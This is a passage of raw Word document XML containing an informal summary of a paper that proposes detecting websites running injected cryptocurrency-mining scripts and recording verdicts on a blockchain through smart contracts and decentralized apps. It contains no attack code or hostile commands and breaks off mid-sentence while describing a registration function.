          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="004B7FF4" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicated that the detection of a malicious website could be a hard problem as the increase of CPU usage can’t be the only indication of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004B7FF4" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> malicious software but he says that the approach introduced by </w:t>
      </w:r>
      <w:r w:rsidR="008A4088">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>another referenced paper</w:t>
      </w:r>
      <w:r w:rsidR="00E555A0" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>can be used to detect 100% of the web mining so what the write wants to do is to detect these malicious websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB1EC0" w14:textId="77777777" w:rsidR="00C829DC" w:rsidRPr="00C829DC" w:rsidRDefault="00C829DC" w:rsidP="000645AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4532399B" w14:textId="4C5F0C67" w:rsidR="000645AB" w:rsidRPr="00C829DC" w:rsidRDefault="000645AB" w:rsidP="000645AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Basic Research directions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06271044" w14:textId="78459AA3" w:rsidR="00E555A0" w:rsidRDefault="00E36E31" w:rsidP="00C829DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The paper solution is towards using blockchain technology in solving the problem where is suggests using decentralized apps (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>dApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">) which are apps that’s not controlled by single entity and the paper is leaning toward using it as a way of telling all other machines all over the world that there is a malicious website </w:t>
      </w:r>
      <w:r w:rsidR="00601B80" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">or tell the administrator of the website that his website is malicious so that he can take action and the detection of this website whether it’s malicious or not </w:t>
      </w:r>
      <w:r w:rsidR="00076402">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00601B80" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">s done using a detection algorithm </w:t>
      </w:r>
      <w:r w:rsidR="00E61B0A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">(the detection algorithm is presented by another paper but not stated in this paper) and what makes people preform detection algorithm on a specific website is that the owner of the website shall offer some sort of prize using smart contracts (which is the basis of the blockchain of Ethereum where Ethereum is one of popular cryptocurrencies and smart contract is just a program that executes on the blockchain to make a contract which looks like a traditional contract but it’s decentralized and fast) where the owner of the website shall request review on his website if someone claimed that his website is malicious  or the owner </w:t>
      </w:r>
      <w:r w:rsidR="002C308F" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>of the website wants to register his website as non-malicious website</w:t>
      </w:r>
      <w:r w:rsidR="0059247A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>, the idea of the whole paper is how to verify that the website isn’t malicious using blockchain technology to record which websites that are malicious and which aren’t malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B44A9E" w14:textId="399F88DC" w:rsidR="00C829DC" w:rsidRDefault="00C829DC" w:rsidP="00C829DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38522442" w14:textId="4245C4A1" w:rsidR="00C829DC" w:rsidRDefault="00C829DC" w:rsidP="00C829DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4800EC76" w14:textId="77777777" w:rsidR="00C829DC" w:rsidRPr="00C829DC" w:rsidRDefault="00C829DC" w:rsidP="00C829DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F716441" w14:textId="17959A2A" w:rsidR="00343151" w:rsidRPr="00C829DC" w:rsidRDefault="00343151" w:rsidP="00343151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary of the paper solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147FE5E" w14:textId="15CDA5BC" w:rsidR="00343151" w:rsidRDefault="00D6102C" w:rsidP="00343151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="050F6284" wp14:editId="0D5BCA08">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>715645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2639060"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="79412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2884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39060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00343151" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The paper provided a solution to the problem as explained briefly in the overview and will be explained in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00343151" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00343151" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> as follows, the following graph summarizes the steps</w:t>
      </w:r>
      <w:r w:rsidR="003312FF" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> from top to bottom</w:t>
      </w:r>
      <w:r w:rsidR="00343151" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> and underneath it the explanation to the graph</w:t>
      </w:r>
      <w:r w:rsidR="00343151">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3906BD" w14:textId="656A7992" w:rsidR="00D6102C" w:rsidRPr="00C829DC" w:rsidRDefault="00D6102C" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Existence</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> of organization that provides web-based mining scripts like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Coinhive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> mining service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6024D2" w14:textId="200075F8" w:rsidR="00343151" w:rsidRPr="00C829DC" w:rsidRDefault="00D642AE" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>deploying a website for the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> time, </w:t>
      </w:r>
      <w:r w:rsidR="00D6102C" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>the web administrator or an attacker injected a mining script inside the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C9D20" w14:textId="156B91CB" w:rsidR="00D6102C" w:rsidRPr="00C829DC" w:rsidRDefault="00D6102C" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">There are some users that </w:t>
      </w:r>
      <w:r w:rsidR="00142A05" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">want to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>preform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> browsing </w:t>
      </w:r>
      <w:r w:rsidR="00AA50FA" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>on this website</w:t>
      </w:r>
      <w:r w:rsidR="00142A05" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03382E39" w14:textId="5FCA1C50" w:rsidR="00142A05" w:rsidRPr="00C829DC" w:rsidRDefault="00142A05" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The users will use a detection program that’s associated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>dApps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00687538" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">to verify the website and establish a public verification environment </w:t>
      </w:r>
      <w:r w:rsidR="000B3C22" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>to tell other users about this malicious website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD11A9" w14:textId="52A38C6C" w:rsidR="000B3C22" w:rsidRPr="00C829DC" w:rsidRDefault="000B3C22" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">Here comes the step of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>the initializing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> the smart contract where either the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> user who detected this website or the website owner will </w:t>
      </w:r>
      <w:r w:rsidR="00001011" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>create the smart contract</w:t>
      </w:r>
      <w:r w:rsidR="00806493" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify this website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EFAA7" w14:textId="4C386F1B" w:rsidR="00806493" w:rsidRPr="00C829DC" w:rsidRDefault="00806493" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The detection program will then use the function ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>RegisterSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
